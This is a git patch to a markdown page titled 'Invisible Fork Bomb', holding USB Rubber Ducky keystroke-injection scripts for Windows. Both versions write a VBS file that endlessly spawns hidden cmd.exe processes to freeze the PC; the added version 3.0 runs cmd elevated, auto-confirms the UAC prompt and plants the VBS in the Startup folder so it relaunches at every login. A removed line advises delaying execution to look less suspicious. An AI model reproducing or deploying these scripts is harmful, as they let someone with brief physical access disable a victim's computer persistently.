From e88241dab9c3fd17201a933c8f3b7f24bd3a86f0 Mon Sep 17 00:00:00 2001 From: BlueArduino20 Date: Sat, 24 Jun 2017 19:15:26 +0200 Subject: [PATCH] Updated Invisible Fork Bomb (markdown) --- Invisible-Fork-Bomb.md | 41 ++++++++++++++++++++++++++++++++--------- 1 file changed, 32 insertions(+), 9 deletions(-) diff --git a/Invisible-Fork-Bomb.md b/Invisible-Fork-Bomb.md index 232bc5c..fb18f41 100644 --- a/Invisible-Fork-Bomb.md +++ b/Invisible-Fork-Bomb.md @@ -1,16 +1,15 @@ -# Invisible Fork Bomb -The script creates and starts a vbs that executes exponentially cmd.exe without visible windows (Fork bomb -> Freezes the PC). +# Invisible Fork Bomb [Windows] +**V. 2.0:** The script creates and starts a vbs that executes exponentially cmd.exe without visible windows (Fork bomb -> Freezes the PC). -# About... -Author: [BlueArduino20](https://github.com/BlueArduino20/) +**V. 3.0:** The same, but it sets the vbs file into the startup. -Version 2.0 +**Original repository:** https://github.com/BlueArduino20/Invisible_fork_bomb -Repository: [https://github.com/BlueArduino20/Invisible_fork_bomb](https://github.com/BlueArduino20/Invisible_fork_bomb) +**Author:** BlueArduino20 + +

Code for Ducky [2.0]

-# Code
DELAY 1000
-REM ^ You should set more delay time if your computer is slow or if the script doesn't work correctly.
 GUI r
 DELAY 500
 STRING cmd
@@ -27,6 +26,30 @@ CTRL z
 ENTER
 DELAY 50
 STRING start forkb.vbs && exit
-REM You can add this: ">null ping localhost -n 5 && " before "start" to make a (5 sec) delay before the vbs execution. (By this way it's less suspicious)
+ENTER
+
+ +

Code for Ducky [3.0]

+[Warning] That version sets the vbs file into the startup. + +
DELAY 1000
+CTRL ESC
+DELAY 500
+STRING cmd
+CTRL SHIFT ENTER
+DELAY 400
+ALT y
+DELAY 500
+STRING copy con "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FB.vbs"
+ENTER
+STRING do
+ENTER
+STRING CreateObject("Wscript.Shell").Run "cmd", 0, False
+ENTER
+STRING loop
+CTRL z
+ENTER
+DELAY 50
+STRING start FB.vbs && exit
 ENTER
 
\ No newline at end of file